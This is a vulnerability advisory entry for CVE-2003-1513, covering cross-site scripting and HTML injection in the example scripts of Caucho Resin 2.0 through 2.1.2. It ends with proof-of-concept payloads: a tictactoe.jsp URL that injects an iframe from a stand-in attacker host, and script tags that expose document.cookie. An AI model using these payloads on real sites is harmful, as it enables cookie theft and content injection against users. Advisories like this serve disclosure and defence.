Caucho Resin Multiple HTML Injection and Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1107523  Vulnerability type: Cross-site scripting
Published: 2003-10-20  Updated: 2003-12-31
CVE ID: CVE-2003-1513
CNNVD-ID: CNNVD-200312-357
Platform: JSP  CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/23262
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-357
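|Vulnerability details
Multiple cross-site scripting (XSS) vulnerabilities exist in the example scripts shipped with Caucho Technology Resin 2.0 through 2.1.2. A remote attacker can inject arbitrary web script or HTML via (1) env.jsp, (2) form.jsp, (3) session.jsp, (4) the move parameter of tictactoe.jsp, or the (5) name or (6) comment fields of guestbook.jsp.
|Exploit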
source: http://www.securityfocus.com/bid/8852/info

It has been reported that Caucho Resin is prone to multiple HTML Injection and cross-site scripting vulnerabilities in various scripts that may allow a remote attacker to cause hostile HTML or script code to be rendered in the browser of a user who follows a malicious link supplied by the attacker.

The affected scripts include env.jsp, form.jsp, session.jsp, and tictactoe.jsp. The 'name' and 'comment' fields of guestbook.jsp have been reported to be vulnerable to HTML injection. An attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of an unsuspecting user. Exploitation may also allow attackers to inject hostile HTML and script code into the sample guestbook.

Successful exploitation of these issues may allow an attacker to steal cookie-based credentials. Other attacks may also be possible.

Caucho Resin version 2.1 and prior have been reported to be prone to this issue; however, other versions may be affected as well.

http://www.example.com:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
|References

Source: XF
Name: resin-name-comment-xss(13460)
Link: http://xforce.iss.net/xforce/xfdb/13460
Source: BID
Name: 8852
Link: http://www.securityfocus.com/bid/8852
Source: SECUNIA
Name: 10031
Link: http://secunia.com/advisories/10031
Source: FULLDISC
Name: 20031019CauchoResin2.x-CrossSiteScripting
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012361.html
